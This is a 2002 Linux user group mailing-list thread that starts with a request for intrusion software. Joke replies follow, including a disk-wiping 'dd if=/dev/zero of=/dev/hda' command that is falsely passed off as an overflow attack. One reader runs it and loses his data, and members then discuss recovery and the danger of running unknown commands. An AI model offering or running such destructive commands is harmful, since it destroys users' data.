[SLUG] i need a sofware to penetrate in to systems

2002-04-16 Thread OSAMA



I need a software that enables me to penetrate in 
to systems can any body help me


Re: [SLUG] i need a sofware to penetrate in to systems

2002-04-16 Thread slug

I find that SSH is generally helpful - there's a variety of ssh clients
available at
http://www.mirrors.wiretapped.net/security/cryptography/apps/ssh/

Cheers!

On Tue, 16 Apr 2002, OSAMA wrote:

> I need a software that enables me to penetrate in to systems can any body help me
> 

-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://lists.slug.org.au/listinfo/slug



Re: [SLUG] i need a sofware to penetrate in to systems

2002-04-16 Thread Matthew Sanderson

OSAMA,

Try this command from a DOS prompt, it accesses the CIA and FBI's websites
and lets you access the restricted area:

FORMAT C:

Have fun!

--m@

On Tue, 16 Apr 2002, OSAMA wrote:

> I need a software that enables me to penetrate in to systems can any body help me
> 

-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://lists.slug.org.au/listinfo/slug



RE: [SLUG] i need a sofware to penetrate in to systems

2002-04-18 Thread Booth, Christopher (Aus) - ATP

Ay Caramba

Does this do what I think it does and is equivalent to format c: in dos ?

There should have been some warning to this, as not everyone is familiar
with the dd command (including me)

I stupidly as a joke tried this, thinking that the nc command would actually
do what was thought.

Please remember that there are newbies and stubies here

I've no idea if what I've done is fixable, but I'm not happy if I've lost
all my data on my hard drive.
I don't care about programs but my personal stuff is hard to replace.

While it may be fun to take the mickey out of Osama, if you lost all your
personal data, and didn't have a backup mechanism available to restore it
from, would you be happy ?

Disappointedly

Chris
-Original Message-
From: Daniel Stone [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, 17 April 2002 8:19 PM
To: Matthew Sanderson
Cc: OSAMA; [EMAIL PROTECTED]
Subject: Re: [SLUG] i need a sofware to penetrate in to systems


On Tue, Apr 16, 2002 at 11:52:19PM -0700, Matthew Sanderson wrote:
> OSAMA,
> 
> Try this command from a DOS prompt, it accesses the CIA and FBI's websites
> and lets you access the restricted area:
> 
> FORMAT C:

But seriously, I suggest:
dd if=/dev/zero of=/dev/hda bs=1k | nc  65535

This is a zero-byte overflow attack - hosts on port 65535 are vulnerable
because that's near an overflow region!

Have fun!
d

-- 
Daniel Stone<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
KDE: It's the new black!
http://www.kde.org
Kopete (multi-protocol IM client) Developer
http://www.kdedevelopers.net/kopete

---
Incoming mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.346 / Virus Database: 194 - Release Date: 10/04/02
 

---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.346 / Virus Database: 194 - Release Date: 10/04/02
 
-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://lists.slug.org.au/listinfo/slug



Re: [SLUG] i need a sofware to penetrate in to systems

2002-04-18 Thread Matthew Hannigan

I really hope you're not trolling too.,

If not, your data is probably not recoverable.

Theoritically it may be; but it would cost thousands
and thousands to do so.   Do a search for "data recovery"
on google.  One good one seems to be http://www.ibas.com/


Booth, Christopher (Aus) - ATP wrote:
> Ay Caramba
> 
> Does this do what I think it does and is equivalent to format c: in dos ?
> 
> There should have been some warning to this, as not everyone is familiar
> with the dd command (including me)
> 
> I stupidly as a joke tried this, thinking that the nc command would actually
> do what was thought.
> 
> Please remember that there are newbies and stubies here
> 
> I've no idea if what I've done is fixable, but I'm not happy if I've lost
> all my data on my hard drive.
> I don't care about programs but my personal stuff is hard to replace.
> 
> While it may be fun to take the mickey out of Osama, if you lost all your
> personal data, and didn't have a backup mechanism available to restore it
> from, would you be happy ?
> 
> Disappointedly
> 
> Chris
> -Original Message-
> From: Daniel Stone [mailto:[EMAIL PROTECTED]]
> Sent: Wednesday, 17 April 2002 8:19 PM
> To: Matthew Sanderson
> Cc: OSAMA; [EMAIL PROTECTED]
> Subject: Re: [SLUG] i need a sofware to penetrate in to systems
> 
> 
> On Tue, Apr 16, 2002 at 11:52:19PM -0700, Matthew Sanderson wrote:
> 
>>OSAMA,
>>
>>Try this command from a DOS prompt, it accesses the CIA and FBI's websites
>>and lets you access the restricted area:
>>
>>FORMAT C:
> 
> 
> But seriously, I suggest:
> dd if=/dev/zero of=/dev/hda bs=1k | nc  65535
> 
> This is a zero-byte overflow attack - hosts on port 65535 are vulnerable
> because that's near an overflow region!
> 
> Have fun!
> d
> 


-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://lists.slug.org.au/listinfo/slug



RE: [SLUG] i need a sofware to penetrate in to systems

2002-04-18 Thread Booth, Christopher (Aus) - ATP

I'm definitely not trolling

I'll get my data back some how I'll leave no stone unturned, but seriously
if people are going to put commands that can potentially ruin a newbie or
gullible person's data, at least make it 100% clear that it is a joke and/or
provide a warning of it's consequences.  I enjoy a joke as much as the next
person.

I'll only be at this company for another 2 weeks, so I don't care about the
OS and stuff.  My personal data which I was just about to back up and write
to CD is going to be hard to replace.

Chris






-Original Message-
From: Matthew Hannigan [mailto:[EMAIL PROTECTED]]
Sent: Friday, 19 April 2002 12:28 PM
To: Booth, Christopher (Aus) - ATP
Cc: 'Daniel Stone'; Matthew Sanderson; [EMAIL PROTECTED]
Subject: Re: [SLUG] i need a sofware to penetrate in to systems


I really hope you're not trolling too.,

If not, your data is probably not recoverable.

Theoritically it may be; but it would cost thousands
and thousands to do so.   Do a search for "data recovery"
on google.  One good one seems to be http://www.ibas.com/


Booth, Christopher (Aus) - ATP wrote:
> Ay Caramba
> 
> Does this do what I think it does and is equivalent to format c: in dos ?
> 
> There should have been some warning to this, as not everyone is familiar
> with the dd command (including me)
> 
> I stupidly as a joke tried this, thinking that the nc command would
actually
> do what was thought.
> 
> Please remember that there are newbies and stubies here
> 
> I've no idea if what I've done is fixable, but I'm not happy if I've lost
> all my data on my hard drive.
> I don't care about programs but my personal stuff is hard to replace.
> 
> While it may be fun to take the mickey out of Osama, if you lost all your
> personal data, and didn't have a backup mechanism available to restore it
> from, would you be happy ?
> 
> Disappointedly
> 
> Chris
> -Original Message-
> From: Daniel Stone [mailto:[EMAIL PROTECTED]]
> Sent: Wednesday, 17 April 2002 8:19 PM
> To: Matthew Sanderson
> Cc: OSAMA; [EMAIL PROTECTED]
> Subject: Re: [SLUG] i need a sofware to penetrate in to systems
> 
> 
> On Tue, Apr 16, 2002 at 11:52:19PM -0700, Matthew Sanderson wrote:
> 
>>OSAMA,
>>
>>Try this command from a DOS prompt, it accesses the CIA and FBI's websites
>>and lets you access the restricted area:
>>
>>FORMAT C:
> 
> 
> But seriously, I suggest:
> dd if=/dev/zero of=/dev/hda bs=1k | nc  65535
> 
> This is a zero-byte overflow attack - hosts on port 65535 are vulnerable
> because that's near an overflow region!
> 
> Have fun!
> d
> 


---
Incoming mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.346 / Virus Database: 194 - Release Date: 10/04/02
 

---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.346 / Virus Database: 194 - Release Date: 10/04/02
 
-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://lists.slug.org.au/listinfo/slug



RE: [SLUG] i need a sofware to penetrate in to systems

2002-04-18 Thread Booth, Christopher (Aus) - ATP

www.r-tt.com

Has R-linux to recover from EXT2 file systems and EXT3 which is based on
EXT2

Strangely though it runs on Windows

Chris

-Original Message-
From: Booth, Christopher (Aus) - ATP 
Sent: Friday, 19 April 2002 12:51 PM
To: 'Matthew Hannigan'; Booth, Christopher (Aus) - ATP
Cc: 'Daniel Stone'; Matthew Sanderson; [EMAIL PROTECTED]
Subject: RE: [SLUG] i need a sofware to penetrate in to systems


I'm definitely not trolling

I'll get my data back some how I'll leave no stone unturned, but seriously
if people are going to put commands that can potentially ruin a newbie or
gullible person's data, at least make it 100% clear that it is a joke and/or
provide a warning of it's consequences.  I enjoy a joke as much as the next
person.

I'll only be at this company for another 2 weeks, so I don't care about the
OS and stuff.  My personal data which I was just about to back up and write
to CD is going to be hard to replace.

Chris






-Original Message-
From: Matthew Hannigan [mailto:[EMAIL PROTECTED]]
Sent: Friday, 19 April 2002 12:28 PM
To: Booth, Christopher (Aus) - ATP
Cc: 'Daniel Stone'; Matthew Sanderson; [EMAIL PROTECTED]
Subject: Re: [SLUG] i need a sofware to penetrate in to systems


I really hope you're not trolling too.,

If not, your data is probably not recoverable.

Theoritically it may be; but it would cost thousands
and thousands to do so.   Do a search for "data recovery"
on google.  One good one seems to be http://www.ibas.com/


Booth, Christopher (Aus) - ATP wrote:
> Ay Caramba
> 
> Does this do what I think it does and is equivalent to format c: in dos ?
> 
> There should have been some warning to this, as not everyone is familiar
> with the dd command (including me)
> 
> I stupidly as a joke tried this, thinking that the nc command would
actually
> do what was thought.
> 
> Please remember that there are newbies and stubies here
> 
> I've no idea if what I've done is fixable, but I'm not happy if I've lost
> all my data on my hard drive.
> I don't care about programs but my personal stuff is hard to replace.
> 
> While it may be fun to take the mickey out of Osama, if you lost all your
> personal data, and didn't have a backup mechanism available to restore it
> from, would you be happy ?
> 
> Disappointedly
> 
> Chris
> -Original Message-
> From: Daniel Stone [mailto:[EMAIL PROTECTED]]
> Sent: Wednesday, 17 April 2002 8:19 PM
> To: Matthew Sanderson
> Cc: OSAMA; [EMAIL PROTECTED]
> Subject: Re: [SLUG] i need a sofware to penetrate in to systems
> 
> 
> On Tue, Apr 16, 2002 at 11:52:19PM -0700, Matthew Sanderson wrote:
> 
>>OSAMA,
>>
>>Try this command from a DOS prompt, it accesses the CIA and FBI's websites
>>and lets you access the restricted area:
>>
>>FORMAT C:
> 
> 
> But seriously, I suggest:
> dd if=/dev/zero of=/dev/hda bs=1k | nc  65535
> 
> This is a zero-byte overflow attack - hosts on port 65535 are vulnerable
> because that's near an overflow region!
> 
> Have fun!
> d
> 


---
Incoming mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.346 / Virus Database: 194 - Release Date: 10/04/02
 

---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.346 / Virus Database: 194 - Release Date: 10/04/02
 

---
Incoming mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.346 / Virus Database: 194 - Release Date: 10/04/02
 

---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.346 / Virus Database: 194 - Release Date: 10/04/02
 
-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://lists.slug.org.au/listinfo/slug



RE: [SLUG] i need a sofware to penetrate in to systems

2002-04-18 Thread Peter Hardy

On Fri, 2002-04-19 at 09:14, Booth, Christopher (Aus) - ATP wrote:
> I've no idea if what I've done is fixable, but I'm not happy if I've lost
> all my data on my hard drive.
> I don't care about programs but my personal stuff is hard to replace.
> 
> While it may be fun to take the mickey out of Osama, if you lost all your
> personal data, and didn't have a backup mechanism available to restore it
> from, would you be happy ?

I've accidentally stomped all over my data on a few occasions - trashed
my partition table, e2fsck'ed /dev/hda instead of /dev/hda2, and most
recently destroyed a partition by rebooting half-way through a fsck.
Not a pleasant way to learn a lesson, but they've all stayed learnt.  I
now back up, for a start. :-)

If you did indeed let that command run to completion, then I'm afraid
you're not going to be able to get anything back without expensive
professional data recovery services.

Reaching in the dark, here, but I imagine it would have failed after
overwriting the section where /dev/zero was kept?  If so, then you may
be able to get to everything after there.
Now.  Just so I know, in case I do it again, is there a relatively easy
way to recover a partition table?

> -Original Message-
> From: Daniel Stone [mailto:[EMAIL PROTECTED]]
> Sent: Wednesday, 17 April 2002 8:19 PM
> To: Matthew Sanderson
> Cc: OSAMA; [EMAIL PROTECTED]
> Subject: Re: [SLUG] i need a sofware to penetrate in to systems
> 
> 
> On Tue, Apr 16, 2002 at 11:52:19PM -0700, Matthew Sanderson wrote:
> > OSAMA,
> > 
> > Try this command from a DOS prompt, it accesses the CIA and FBI's websites
> > and lets you access the restricted area:

Please please PLEASE don't feed the trolls.  It only encourages them.

> > FORMAT C:
> 
> But seriously, I suggest:
> dd if=/dev/zero of=/dev/hda bs=1k | nc  65535
> 
> This is a zero-byte overflow attack - hosts on port 65535 are vulnerable
> because that's near an overflow region!

As poor as it was, this joke should have been directed at slug-chat,
where there's very little risk of being taken seriously.  You should
also make your humour tags explicit - it's too hard to infer from
context.

-- 
Pete
[EMAIL PROTECTED]

Life in this world is, as it were, a sojourn in a cave.  What can we
know of reality?  For all we see of the true nature of existence is,
shall
we say, no more than bewildering and amusing shadows cast upon the inner
wall of the cave by the unseen blinding light of absolute truth, from
which
we may or may not deduce some glimmer of veracity, and we as troglodyte
seekers of wisdom can only lift our voices to the unseen and say,
humbly,
"Go on, do Deformed Rabbit... it's my favourite."
-- Didactylos the philosopher
   (Terry Pratchett, Small Gods)

-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://lists.slug.org.au/listinfo/slug



Re: [SLUG] i need a sofware to penetrate in to systems

2002-04-18 Thread Jamie Wilkinson

This one time, at band camp, Peter Hardy wrote:
>Reaching in the dark, here, but I imagine it would have failed after
>overwriting the section where /dev/zero was kept?  If so, then you may
>be able to get to everything after there.

Nup.  The /dev/zero inode may have been trashed, but the kernel still has a
filehandle to the device open for the dd process, so it would have kept
feeding zeros.  /dev/ is just an index to the devices.

-- 
[EMAIL PROTECTED]   http://spacepants.org/jaq.gpg
 
Program aborting:
Close all that you have worked on.
You ask far too much.
-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://lists.slug.org.au/listinfo/slug



Re: [SLUG] i need a sofware to penetrate in to systems

2002-04-18 Thread Matthew Hannigan

No good.  You don't have a file system!

You need some of the techniques described
here in this classic paper:
http://www.cs.auckland.ac.nz/~pgut001/pubs/secure_del.html

I suspect that recreating the data is far cheaper.



Booth, Christopher (Aus) - ATP wrote:
> www.r-tt.com
> 
> Has R-linux to recover from EXT2 file systems and EXT3 which is based on
> EXT2
> 
> Strangely though it runs on Windows
> 
> Chris
> 
> -Original Message-
> From: Booth, Christopher (Aus) - ATP 
> Sent: Friday, 19 April 2002 12:51 PM
> To: 'Matthew Hannigan'; Booth, Christopher (Aus) - ATP
> Cc: 'Daniel Stone'; Matthew Sanderson; [EMAIL PROTECTED]
> Subject: RE: [SLUG] i need a sofware to penetrate in to systems
> 
> 
> I'm definitely not trolling
> 
> I'll get my data back some how I'll leave no stone unturned, but seriously
> if people are going to put commands that can potentially ruin a newbie or
> gullible person's data, at least make it 100% clear that it is a joke and/or
> provide a warning of it's consequences.  I enjoy a joke as much as the next
> person.
> 
> I'll only be at this company for another 2 weeks, so I don't care about the
> OS and stuff.  My personal data which I was just about to back up and write
> to CD is going to be hard to replace.
> 
> Chris
> 
> 
> 
> 
> 
> 
> -Original Message-
> From: Matthew Hannigan [mailto:[EMAIL PROTECTED]]
> Sent: Friday, 19 April 2002 12:28 PM
> To: Booth, Christopher (Aus) - ATP
> Cc: 'Daniel Stone'; Matthew Sanderson; [EMAIL PROTECTED]
> Subject: Re: [SLUG] i need a sofware to penetrate in to systems
> 
> 
> I really hope you're not trolling too.,
> 
> If not, your data is probably not recoverable.
> 
> Theoritically it may be; but it would cost thousands
> and thousands to do so.   Do a search for "data recovery"
> on google.  One good one seems to be http://www.ibas.com/
> 
> 
> Booth, Christopher (Aus) - ATP wrote:
> 
>>Ay Caramba
>>
>>Does this do what I think it does and is equivalent to format c: in dos ?
>>
>>There should have been some warning to this, as not everyone is familiar
>>with the dd command (including me)
>>
>>I stupidly as a joke tried this, thinking that the nc command would
> 
> actually
> 
>>do what was thought.
>>
>>Please remember that there are newbies and stubies here
>>
>>I've no idea if what I've done is fixable, but I'm not happy if I've lost
>>all my data on my hard drive.
>>I don't care about programs but my personal stuff is hard to replace.
>>
>>While it may be fun to take the mickey out of Osama, if you lost all your
>>personal data, and didn't have a backup mechanism available to restore it
>>from, would you be happy ?
>>
>>Disappointedly
>>
>>Chris
>>-Original Message-
>>From: Daniel Stone [mailto:[EMAIL PROTECTED]]
>>Sent: Wednesday, 17 April 2002 8:19 PM
>>To: Matthew Sanderson
>>Cc: OSAMA; [EMAIL PROTECTED]
>>Subject: Re: [SLUG] i need a sofware to penetrate in to systems
>>
>>
>>On Tue, Apr 16, 2002 at 11:52:19PM -0700, Matthew Sanderson wrote:
>>
>>
>>>OSAMA,
>>>
>>>Try this command from a DOS prompt, it accesses the CIA and FBI's websites
>>>and lets you access the restricted area:
>>>
>>>FORMAT C:
>>
>>
>>But seriously, I suggest:
>>dd if=/dev/zero of=/dev/hda bs=1k | nc  65535
>>
>>This is a zero-byte overflow attack - hosts on port 65535 are vulnerable
>>because that's near an overflow region!
>>
>>Have fun!
>>d
>>
> 
> 
> 
> ---
> Incoming mail is certified Virus Free.
> Checked by AVG anti-virus system (http://www.grisoft.com).
> Version: 6.0.346 / Virus Database: 194 - Release Date: 10/04/02
>  
> 
> ---
> Outgoing mail is certified Virus Free.
> Checked by AVG anti-virus system (http://www.grisoft.com).
> Version: 6.0.346 / Virus Database: 194 - Release Date: 10/04/02
>  
> 
> ---
> Incoming mail is certified Virus Free.
> Checked by AVG anti-virus system (http://www.grisoft.com).
> Version: 6.0.346 / Virus Database: 194 - Release Date: 10/04/02
>  
> 
> ---
> Outgoing mail is certified Virus Free.
> Checked by AVG anti-virus system (http://www.grisoft.com).
> Version: 6.0.346 / Virus Database: 194 - Release Date: 10/04/02
>  


-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://lists.slug.org.au/listinfo/slug



Re: [SLUG] i need a sofware to penetrate in to systems

2002-04-18 Thread Andrew Bennetts

On Fri, Apr 19, 2002 at 12:51:29PM +1000, Booth, Christopher (Aus) - ATP wrote:
> 
> I'll only be at this company for another 2 weeks, so I don't care about the
> OS and stuff.  My personal data which I was just about to back up and write
> to CD is going to be hard to replace.

If you let the command complete, you've got essentially no hope.  You
now have a hard drive completely filled with zeros and only zeros.

If you interrupted it by Ctrl-C or powering down, you should hopefully
have a fair bit of your drive left intact.  Luckily, the command
specified 1k block sizes, which is going to be relatively slow, so if
you did interrupt it, you may be in luck.

You'll want to try find a program that can search for ext2 superblocks,
and then tries to recover based on that.  I can't recall the name of the
program I have in mind at the moment, so hopefully google can help.
I've no idea how well these recovery programs work, as I've never had to
use them.

I wish you good luck in recovering your data... it's never a pleasant
thing to have happen :(

Regards,

-Andrew.

-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://lists.slug.org.au/listinfo/slug



Re: [SLUG] i need a sofware to penetrate in to systems

2002-04-18 Thread Mary

On Fri, Apr 19, 2002 at 02:44:44PM +1000, Andrew Bennetts wrote:
> On Fri, Apr 19, 2002 at 12:51:29PM +1000, Booth, Christopher (Aus) -
> ATP wrote:
> > I'll only be at this company for another 2 weeks, so I don't care
> > about the OS and stuff.  My personal data which I was just about to
> > back up and write to CD is going to be hard to replace.
> 
> If you let the command complete, you've got essentially no hope.  You
> now have a hard drive completely filled with zeros and only zeros.

At which point it becomes the realm of forensics type people, who can
sometimes at least find traces of the previous data there. But... $$$

-Mary.
-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://lists.slug.org.au/listinfo/slug



RE: [SLUG] i need a sofware to penetrate in to systems

2002-04-18 Thread Wienand Ian


> Reaching in the dark, here, but I imagine it would have failed after
> overwriting the section where /dev/zero was kept?  If so, then you may
> be able to get to everything after there.
> Now.  Just so I know, in case I do it again, is there a relatively easy
> way to recover a partition table?
> 
I don't think it would be that clear cut when it would stop.  There
are many other processes running, and dd is probably sleeping a lot while it
waits for the disk to catch up trashing itself.  

"easy way to recover" and "partition table" is unfortunately, in my
experience, a oxymoron.  though you could copy the first 512 bytes of your
disk to a floppy every now and then to keep a backup.   you'd only need to
update it when you changed your partitions, which would not be very often.

Now I'm just thinking, but if you have stopped this before it got to
your last partition, maybe this type of procedure *might* work.  You told me
it was all in a FAT16 partition at the end of the disk where all the
relevant stuff is kept.  your partition table is gone for sure, but chances
are that things near the end of the disk are ok.

1) put the drive into another working computer.
2) use dd again to copy the entire drive to a file; e.g. dd
if=/dev/hda2 of=/tmp/drive.file bs=1k
3) use a hex dump program such as xxd to look through this file you
just copied.  
4) search for the *string* FAT16.  hopefully, this will be the
filesystem id type of your boot block on that partition
5) note how far in this is.  this starts of offset 0x36, so go back
54 bytes.  this should be the start of your fat partition.  note this (i.e.
where FAT16 is - 54 bytes)
6) now use dd again or write a small program to cut out the start of
that file (sorry for being vague but i'd have to think about this part more)
up to the start of your previously noted fat partition.  hopefully, that
will now be a completely valid fat16 partition.  whatever is after it
shouldn't matter.
7) attempt to loopback mount this file as a fat16 file system.  

good luck
-i
**
CAUTION: This message may contain confidential information intended only for the use 
of the addressee named above. If you are not the intended recipient of this message, 
any use or disclosure of this message is prohibited.  If you received this message in 
error please notify Mail Administrators immediately.  You must obtain all necessary 
intellectual property clearances before doing anything other than displaying this 
message on your monitor.  There is no intellectual property licence.  Any views 
expressed in this message are those of the individual sender and may not necessarily 
reflect the views of Woolworths Ltd.
**
-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://lists.slug.org.au/listinfo/slug



Re: [SLUG] i need a sofware to penetrate in to systems

2002-04-18 Thread Jamie Wilkinson

This one time, at band camp, Andrew Bennetts wrote:
>You'll want to try find a program that can search for ext2 superblocks,
>and then tries to recover based on that.  I can't recall the name of the
>program I have in mind at the moment, so hopefully google can help.
>I've no idea how well these recovery programs work, as I've never had to
>use them.

e2recover served me well when I've done similar things.

-- 
[EMAIL PROTECTED]   http://spacepants.org/jaq.gpg
 
Boy, when Marge first told me she was going to the Police Academy, I
thought it's be fun and exciting, like the movie `Spaceballs.'  But
instead, it's been painful and disturbing, like the movie `Police
Academy.'
-- Homer Simpson, The Springfield Connection
-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://lists.slug.org.au/listinfo/slug



Re: [SLUG] i need a sofware to penetrate in to systems

2002-04-19 Thread Daniel Stone

On Fri, Apr 19, 2002 at 09:14:06AM +1000, Booth, Christopher (Aus) - ATP wrote:
> Ay Caramba
> [i trashed my hd, aargh]

Chris,
My apologies for all this mess; next time I'll try to make the 
tags more clear. I'm sorry that all this happened - it always sucks arse
to lose data.

Sorry is,
d

-- 
Daniel Stone<[EMAIL PROTECTED]>  <[EMAIL PROTECTED]>
KDE: It's the new black!  http://www.kde.org
Kopete (multi-protocol IM client) Developer  http://www.kdedevelopers.net/kopete



msg22723/pgp0.pgp
Description: PGP signature


Rule #1 [Was Re: [SLUG] i need a sofware to penetrate in to systems]

2002-04-18 Thread Crossfire

Booth, Christopher (Aus) - ATP was once rumoured to have said:
> Ay Caramba
> 
> Does this do what I think it does and is equivalent to format c: in
> dos ?

Nearly - it overwrites /dev/hda with zeros.
 
> There should have been some warning to this, as not everyone is familiar
> with the dd command (including me)

That would have spoilt the joke.

> I stupidly as a joke tried this, thinking that the nc command would actually
> do what was thought.
> 
> Please remember that there are newbies and stubies here

And because of this, I will now cite RULE #1:

NEVER, UNDER ANY CIRCUMSTANCES, RUN RANDOM COMMANDS GIVEN TO YOU BY
SOMEBODY ELSE.  ESPECIALLY AS ROOT.

You should first research the commands being used using info and man
to determine their function, and what each argument supplied is really
doing.

If you can't see how the commands perform the advertised effects,
maybe they don't do that at all.

C.
-- 
--==--
  Crossfire  | This email was brought to you
  [EMAIL PROTECTED] | on 100% Recycled Electrons
--==--
-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://lists.slug.org.au/listinfo/slug



Re: Rule #1 [Was Re: [SLUG] i need a sofware to penetrate in to systems]

2002-04-18 Thread Rick Welykochy

Crossfire wrote:

> And because of this, I will now cite RULE #1:
> 
> NEVER, UNDER ANY CIRCUMSTANCES, RUN RANDOM COMMANDS GIVEN TO YOU BY
> SOMEBODY ELSE.  ESPECIALLY AS ROOT.
> 
> You should first research the commands being used using info and man
> to determine their function, and what each argument supplied is really
> doing.
> 
> If you can't see how the commands perform the advertised effects,
> maybe they don't do that at all.

Nice sentiment. Ignoring the word "RANDOM" (which is irrelevant), Rule #1
needs a few additional caveats:

(*) never download and run any software in binary form from the Internet.

(advice to this effect is almost as common as adivsing one to run
 a specific command)

(*) never compile and run any software from source, unless you have read
the entire source file and understand what the source code does.

(*) never run an O/S unless you can fully audit its internals and fully
understand the security and privacy issues involved.

Need I continue?

The reality is that people are always going to cry for advice to "help fix
this or that little problem" and then blindly do what they've been advised.
I'd guess about 99% of computer users out there do this, and can only do this.
We can't all be wizards :)



Can I propose Rule #2:

DO NOT USE TECHNOLOGY UNLESS YOU ARE FAMILIAR WITH ITS INTERFACE, HOW IT FUNCTIONS
AND OPERATES AND WHAT IS EXPECTED OF IT.  (cf. "driving a vehicle", "brain surgery",
"writing software", "running Linux" ...)



-- 
_
Rick Welykochy || Praxis Services Pty Limited

Don't ask me the difference between analysis and design.
The distinction is spiritual and has to do with the afterlife.
-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://lists.slug.org.au/listinfo/slug



Re: Rule #1 [Was Re: [SLUG] i need a sofware to penetrate in to systems]

2002-04-18 Thread Crossfire

Rick Welykochy was once rumoured to have said:
> Crossfire wrote:
> 
> > And because of this, I will now cite RULE #1:
> > 
> > NEVER, UNDER ANY CIRCUMSTANCES, RUN RANDOM COMMANDS GIVEN TO YOU BY
> > SOMEBODY ELSE.  ESPECIALLY AS ROOT.
> > 
> > You should first research the commands being used using info and man
> > to determine their function, and what each argument supplied is really
> > doing.
> > 
> > If you can't see how the commands perform the advertised effects,
> > maybe they don't do that at all.
> 
> Nice sentiment. Ignoring the word "RANDOM" (which is irrelevant), Rule #1
> needs a few additional caveats:
> 
> (*) never download and run any software in binary form from the Internet.
> 
> (advice to this effect is almost as common as adivsing one to run
>  a specific command)
>
> (*) never compile and run any software from source, unless you have read
> the entire source file and understand what the source code does.
> 
> (*) never run an O/S unless you can fully audit its internals and fully
> understand the security and privacy issues involved.
> 
> Need I continue?

Rule #1 as it stands is within the capability of a newbie to execute -
it only requires the ability to use man and info (which are things
they should be learning to do right from the word go), and the ability
to read technical documentation (which is still that people should
encourage because its wonderful for getting one's self out of strife).

> The reality is that people are always going to cry for advice to
> "help fix this or that little problem" and then blindly do what
> they've been advised.  I'd guess about 99% of computer users out
> there do this, and can only do this.  We can't all be wizards :)

No, but there isn't any reason why good defensive behaviour can't be
used all the time.

If you haven't got backups of your personal data, what is the largest
amount of risk you're willing to take?

> Can I propose Rule #2:
 
> DO NOT USE TECHNOLOGY UNLESS YOU ARE FAMILIAR WITH ITS INTERFACE,
> HOW IT FUNCTIONS AND OPERATES AND WHAT IS EXPECTED OF IT.
> (cf. "driving a vehicle", "brain surgery", "writing software",
> "running Linux" ...)

Well, we are required to have a license to drive
cars/motorcycles/other-vehicles...

C.
-- 
--==--
  Crossfire  | This email was brought to you
  [EMAIL PROTECTED] | on 100% Recycled Electrons
--==--
-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://lists.slug.org.au/listinfo/slug